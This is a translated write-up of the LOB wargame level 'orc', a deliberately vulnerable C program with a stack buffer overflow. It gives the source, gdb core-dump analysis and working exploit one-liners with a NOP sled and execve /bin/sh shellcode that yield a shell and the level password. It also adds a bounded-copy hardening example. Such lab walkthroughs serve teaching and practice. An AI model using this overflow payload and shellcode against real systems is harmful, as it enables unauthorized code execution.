[LOB] goblin -> orc

2019. 7. 28. 23:43 | Wargame & CTF/LOB

/*
        The Lord of the BOF : The Fellowship of the BOF
        - orc
        - egghunter
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy */
 
extern char **environ;
 
int main(int argc, char *argv[])
{
    char buffer[40];   /* stack layout: [buffer(40)][SFP(4)][RET(4)] */
    int i;
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    // egghunter: wipe every environment variable, so shellcode stored
    // in the environment (an eggshell) is gone before the copy happens
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
 
    // byte 47 of argv[1] lands on the top byte of the saved return
    // address; it must be 0xbf, i.e. RET has to remain a stack address
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]);   // no bounds check: the overflow this level is about
    printf("%s\n", buffer);
    return 0;
}


Because of the egghunter, the eggshell (shellcode placed in an environment variable) can no longer be used.

[buffer(40)][SFP(4)][RET(4)]

So put the shellcode in argv[2] and point RET at the address of argv[2].
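To make the layout above concrete, here is an added example (my own illustration, not code from the LOB source or from the original write-up) that computes the distance from buffer to RET, shows why byte 47 is the one orc checks, and places the unchecked strcpy() pattern beside a bounded copy that refuses input which would not fit. The function names ret_offset, check_index, overflow_bytes and bounded_copy are my own choices for this illustration.

```c
/* Added example: stack layout arithmetic for [buffer(40)][SFP(4)][RET(4)]
 * and a bounded replacement for the unchecked strcpy(). Not part of the
 * LOB source; all function names here are illustrative. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same as orc's char buffer[40] */
#define SFP_SIZE 4    /* saved frame pointer on 32-bit x86 */
#define RET_SIZE 4    /* saved return address */

/* Distance from the start of a local buffer of the given size to the saved
 * return address: the buffer itself plus the saved EBP. For 40 bytes this
 * is the 44 behind the write-up's "A"*44. */
size_t ret_offset(size_t buffer_size) {
    return buffer_size + SFP_SIZE;
}

/* Index of the last byte of RET in argv[1]: offset 44 plus 4 bytes of RET,
 * minus one. On little-endian x86 this is the most significant byte, which
 * is why orc compares argv[1][47] against 0xbf. */
size_t check_index(void) {
    return ret_offset(BUF_SIZE) + RET_SIZE - 1;   /* 47 */
}

/* How many bytes an unchecked strcpy() of a string of input_len bytes would
 * write past a buffer of buffer_size bytes (0 if it fits). strcpy() stops
 * at the NUL terminator, never at sizeof(buffer). */
size_t overflow_bytes(size_t input_len, size_t buffer_size) {
    size_t needed = input_len + 1;          /* +1 for the terminating NUL */
    return needed > buffer_size ? needed - buffer_size : 0;
}

/* Hardened form: copy only when the whole string plus its NUL fits.
 * Returns 0 on success, -1 if the input would not fit (nothing copied). */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')   /* never scans past dst_size */
        len++;
    if (len >= dst_size)
        return -1;                               /* would need len+1 > dst_size */
    memcpy(dst, src, len + 1);                   /* copies the NUL as well */
    return 0;
}

int main(int argc, char *argv[]) {
    char buffer[BUF_SIZE];
    const char *input = argc > 1 ? argv[1] : "hello";   /* constructed default */

    printf("RET starts %zu bytes past buffer; byte %zu is the one orc checks\n",
           ret_offset(BUF_SIZE), check_index());
    printf("a %zu-byte argv[1] would overrun buffer by %zu bytes\n",
           strlen(input), overflow_bytes(strlen(input), BUF_SIZE));

    if (bounded_copy(buffer, sizeof buffer, input) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

Run with a 48-byte argument and overflow_bytes() reports 9: the four bytes of SFP, the four of RET and the NUL, which is exactly what the write-up's "A"*44 plus a 4-byte address overwrites; bounded_copy() rejects that same argument instead of copying it.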


[goblin@localhost tmp]$ ./orc `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[goblin@localhost tmp]$ gdb -q orc core 
Core was generated by `./orc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff6d0:    0x00000000    0xbffff714    0xbffff724    0x40013868
0xbffff6e0:    0x00000003    0x08048450    0x00000000    0x08048471
0xbffff6f0:    0x08048500    0x00000003    0xbffff714    0x08048390
0xbffff700:    0x0804860c    0x4000ae60    0xbffff70c    0x40013e90
0xbffff710:    0x00000003    0xbffff824    0xbffff82a    0xbffff85b
0xbffff720:    0x00000000    0xbffffc5d    0xbffffc72    0xbffffc8a
0xbffff730:    0xbffffca9    0xbffffccb    0xbffffcdd    0xbffffce9
0xbffff740:    0xbffffeac    0xbffffecb    0xbffffee5    0xbffffefa
0xbffff750:    0xbfffff05    0xbfffff1e    0xbfffff2d    0xbfffff35
0xbffff760:    0xbfffff46    0xbfffff54    0xbfffff62    0xbfffff73
0xbffff770:    0xbfffff81    0xbfffff8c    0xbfffff9e    0xbfffffda
0xbffff780:    0xbfffffe2    0x00000000    0x00000003    0x08048034
0xbffff790:    0x00000004    0x00000020    0x00000005    0x00000006
0xbffff7a0:    0x00000006    0x00001000    0x00000007    0x40000000
0xbffff7b0:    0x00000008    0x00000000    0x00000009    0x08048450
0xbffff7c0:    0x0000000b    0x000001f7    0x0000000c    0x000001f7
0xbffff7d0:    0x0000000d    0x000001f7    0x0000000e    0x000001f7
0xbffff7e0:    0x00000010    0x0f8bfbff    0x0000000f    0xbffff81f
0xbffff7f0:    0x00000000    0x00000000    0x00000000    0x00000000
0xbffff800:    0x00000000    0x00000000    0x00000000    0x00000000
(gdb) 
0xbffff810:    0x00000000    0x00000000    0x00000000    0x69000000
0xbffff820:    0x00363836    0x726f2f2e    0x41410063    0x41414141
0xbffff830:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff840:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff850:    0x41414141    0xbfbf4141    0x9000bfbf    0x90909090
0xbffff860:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff870:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff880:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff890:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8a0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8b0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8c0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8d0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8e0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8f0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff900:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff910:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff920:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff930:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff940:    0x90909090    0x90909090    0x90909090    0x90909090


Trigger a segmentation fault so a core file is dumped, then analyze it. If the "core dumped" message does not appear, create a tmp directory, copy the orc binary into it and run it from there. If that still does not work, running ulimit -c unlimited should fix it.

Set RET so that (start of the 0x90 region) <= RET <= (end of the 0x90 region). 0x90 (the NOP opcode) does nothing except continue to the next instruction, so execution slides along until it reaches the shellcode, which then runs. This is called a NOP sled. I will put 0xbffff901 in RET.


[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\x01\xf9\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ my-pass
euid = 504
cantata
 


orc : cantata
